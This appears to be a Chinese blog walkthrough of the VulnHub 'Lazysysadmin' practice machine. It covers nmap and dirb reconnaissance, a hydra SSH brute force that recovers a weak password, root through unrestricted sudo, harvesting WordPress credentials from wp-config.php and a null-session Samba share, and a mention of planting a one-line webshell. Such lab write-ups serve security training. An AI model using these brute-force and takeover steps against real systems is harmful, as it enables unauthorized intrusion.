vulnhub系列:Lazysysadmin

vulnhub系列:Lazysysadmin

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240804103117713

nmap扫描端口,开放端口:22、80、139、445、3306、6667

nmap 192.168.23.177 -p- -A -sV -Pn

image-20240804103417538

dirb扫描目录,发现存在phpmyadmin和wordpress

dirb http://192.168.23.177/

image-20240804103553709

访问80端口下robots.txt

image-20240804103726454

依次拼接,/Backnode_files下发现一些js文件,大概翻了翻,没啥发现

image-20240804103919978

访问phpmyadmin,尝试弱口令登录,没有成功

image-20240804104046468

访问wordpress,里面反复强调我的名字是 togie

image-20240804104148335

二、getshell

kali使用hydra工具,爆破ssh密码(用户togie),得到密码12345,(rockyou.txt默认路径在/usr/share/wordlists)

hydra -l togie -P rockyou.txt ssh://192.168.23.177

image-20240804104721088

ssh连接togie,成功连接

togie:12345
ssh togie@192.168.23.177

image-20240804105022825

三、提权

查看当前权限,显示为all

sudo -l

image-20240804105247096

直接sudo su提权,提权成功

sudo su

image-20240804105331846

四、其他

在/var/www/html/wordpress下的wp-config.php中找到wordpress账号密码

admin:TogieMYSQL12345^^

image-20240804113000219

samba服务漏洞

使用enum4linux扫描一下共享文件

enum4linux 192.168.23.177

发现可以空账号密码访问

image-20240804113427820

共享文件名

image-20240804113507703

win+r,输入 \\192.168.23.177\share$ 访问共享文件

\\192.168.23.177\share$

image-20240804114035845

这里可以通过共享文件获取wordpress账号密码,在wordpress后台文件写入一句话getshell

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值